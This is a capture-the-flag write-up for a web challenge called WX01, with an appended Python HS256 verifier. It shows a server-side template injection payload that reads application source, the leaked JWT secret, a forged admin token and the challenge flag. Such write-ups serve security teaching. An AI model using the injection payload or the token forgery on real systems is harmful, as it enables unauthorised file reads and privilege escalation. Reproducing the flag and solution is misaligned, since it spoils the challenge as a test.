WX01 - 1000pts
Access the url at: and find a way to login to the admin portal to get the flag. Note: You have been provided with the following credentials to help you: username: `tim`, password: `berners-lee`
There is a login form and a form to enter an email address to get help logging in. Attempting to login with the provided credentials, `tim:berners-lee`, and monitoring requests using Burp Suite shows a POST request whose JSON body has an `action` key set to `verify` and a `token` key holding a JSON Web Token.

I attempted to brute-force decrypt this JWT, but it did not succeed.

I moved on to the help form. It has to serve a purpose and thus must be vulnerable to some form of input. I tried a similar approach to the Italian dish suggestion site from . Crashing the help form using the SSTI string `{{foo()}}` prints this as part of a stacktrace:
We have access to `locals()` and `globals()`. Also, `open()` lets us read an arbitrary file.

Use `{{open('lambda_function.py').read()}}` to dump the contents of `lambda_function.py`:

The JWT key is `aversion-chute-freeway-corporal`.
Login with credentials `tim:berners-lee` to get a JWT: `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJ1c2VyIn0.j8wX114OSLEo2I4S6GQ4wQ4ZszXtyp0wFc0lpwc1yRQ`.

Use to change the `role` value from `user` to `admin` with the leaked secret key to get a new JWT: `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU`

Send a request with this JSON `{"action":"verify","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU"}` to get the flag.

`muLtiStagingIT710-12`
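As an added example (not part of the writeup or the challenge's code), a stdlib-only Python HS256 verifier that decodes the two tokens quoted above and shows what a correct server-side check has to do: pin the algorithm, compare the MAC in constant time and enforce `exp`. It also shows that editing `role` without re-signing is rejected while anything signed with the leaked key passes, which is why the secret leaking through the help form is the whole break. The tokens and key come from the writeup; `constructed-test-key` is a constructed value.

```python
import base64, hashlib, hmac, json, time
# Tokens quoted in the writeup: the user token returned at login, and the forged admin token.
USER_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJ1c2VyIn0.j8wX114OSLEo2I4S6GQ4wQ4ZszXtyp0wFc0lpwc1yRQ"
ADMIN_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU"
LEAKED_KEY = "aversion-chute-freeway-corporal"  # HS256 secret dumped from lambda_function.py via the SSTI

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def decode_claims(token: str):
    """Decode header and payload WITHOUT checking the signature: for inspection only."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(claims: dict, key: str) -> str:
    """Mint an HS256 token: whoever holds the key can assert any claims, role included."""
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"

def verify_hs256(token: str, key: str, now=None):
    """Return the claims if valid, else None: pins alg, constant-time MAC compare, enforces exp."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
            return None  # refuse alg=none and algorithm-confusion headers
        expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
        now = int(time.time()) if now is None else now
        if "exp" in claims and now >= claims["exp"]:
            return None
        return claims
    except (ValueError, AttributeError):
        return None

def tamper_role(token: str, role: str) -> str:
    """Change the role claim but keep the old signature; a correct verifier must reject this."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    claims = dict(json.loads(b64url_decode(payload_b64)), role=role)
    return f"{header_b64}.{b64url_encode(json.dumps(claims, separators=(',', ':')).encode())}.{sig_b64}"

if __name__ == "__main__":
    print(decode_claims(USER_TOKEN)[1], decode_claims(ADMIN_TOKEN)[1])  # role differs; only the forged one has exp
    # Was the recovered key really the signing key? (admin token checked as of its iat, since its exp is long past)
    print(verify_hs256(USER_TOKEN, LEAKED_KEY) is not None, verify_hs256(ADMIN_TOKEN, LEAKED_KEY, now=1617724953) is not None)
```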